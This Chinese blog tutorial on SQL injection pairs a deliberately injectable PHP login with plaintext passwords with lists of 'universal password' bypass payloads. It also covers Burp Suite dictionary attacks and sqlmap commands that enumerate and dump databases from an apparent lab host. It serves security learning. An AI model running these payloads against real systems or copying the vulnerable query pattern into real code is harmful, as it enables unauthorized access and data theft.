SQL注入

PHP + mysql

index.html
<html>
    <body>
        <form    action="/login/login.php"  method="POST">
        
            <p>User: <input type="text" name="user"  / ></p>
            <p>Password: <input  type="text" name="passwd" /></p>
            <input type="submit"  value="Tijiao">
        </form>
        </form>
    </body>
</html>
login.php
<?php
// 从前端 html传过来的表单(form)中,提取method=POST的表单所有值,存到一个Array中,通过数组[ ]索引(html传入的<input name=>)获取对应值
$name =  $_POST['user'];
$passwd = $_POST['passwd'];
// 在本地后端数据库先创建basic (db),然后connect链接
$con = mysqli_connect("localhost:3306", "root","root","basic");
if(!$con){
    die("connect error  " );
}

echo "<p>name: $name";
echo "<p>passwd: $passwd";


$sql_check = "SELECT * FROM login_table WHERE user='{$name}' and passwd='{$passwd}'";
// query() 根据sql语言在数据库中询问查询
$check_result = mysqli_query($con, $sql_check);
if(!$check_result)
{
    printf("\n");
    printf("Error : %s\n", mysqli_error($con));
    exit();
}
if(mysqli_num_rows($check_result)>0)
{    
    // 如果查到结果 大于0,就返回name
    echo "welcome $name";
}
else {
    echo "<p>no user </p>";
    // 如果没有查到相关内容(result=0),就注册
    $sql_comment = "INSERT INTO login_table(user, passwd)VALUES('$name','$passwd')";
    mysqli_query($con, $sql_comment);
    echo "<p>Has logined $name</p>";
}
mysqli_close($con);
?>

SQL注入

No1: 后台登录万能密码

 admin' or 1=1 -- (最后加一个空格)(注释后面)

在这里插入图片描述
注意 注释位置一定要加空格!

在这里插入图片描述
在这里插入图片描述
其他后台万能密码
ASP 万能密码

1"or "a"="a

2')or('a'='a

3or 1=1--

4'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:"or 1=1%00

15:'xor

16:用户名 ’ UNION Select 1,1,1 FROM admin Where ‘’=’ (替换表名admin) 密码 1

17: admin’ or ‘a’='a 密码随便

PHP 万能密码

1:'or 1=1/*

2:User: something

Pass: ' or '1'='1

JSP 万能密码:

1:1'or'1'='1:

2:admin' or 1=1/*
————————————————
原文链接

可以放到一个文件中,然后用burpsuite进行破解
在这里插入图片描述
劫到该post报文,对passwd进行关键词爆破
在这里插入图片描述
file 中选刚才字典,然后attack
在这里插入图片描述
登录成功:
在这里插入图片描述

文章索引 id

在这里插入图片描述
在这里插入图片描述
报错,说明有交互,可能存在SQL注入漏洞。

sqlmap使用

0 超详细SQLMap使用攻略及技巧分享

1 通过请求报文分析

用burpsuite截获请求报文,保存到txt文件里,起名如:request.txt
在这里插入图片描述
执行命令:

sqlmap -r request.txt -p passwd(关键词)  --dbs
-r REQUESTFILE
              Load HTTP request from a file
              
-p TESTPARAMETER
              Testable parameter(s)
--dbs  Enumerate DBMS databases  //枚举数据库管理系统所有数据库       

注入点分析

在这里插入图片描述

  1. 注入点关键字段为 --data
sqlmap -u "http://220.249.52.133:41185/"  --data "search=1" --dbs
--data  通过POST发送数据参数

结果返回两可用数据库
在这里插入图片描述

  1. 根据得到的数据库,查看指定数据库的tables
 sqlmap -u "http://220.249.52.133:41185/"  --data "search=1" -D news --tables   (注意:删掉--dbs)
-D DB  (指定数据库名)             DBMS database to enumerate
--tables   获取指定数据库下面的所有table

在这里插入图片描述
4. 暴力破解table内的项数据

sqlmap -u "http://220.249.52.133:41185/"  --data "search=1" -T secret_table --dump
-T TBL(指定表命令) DBMS database table(s) to enumerate

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值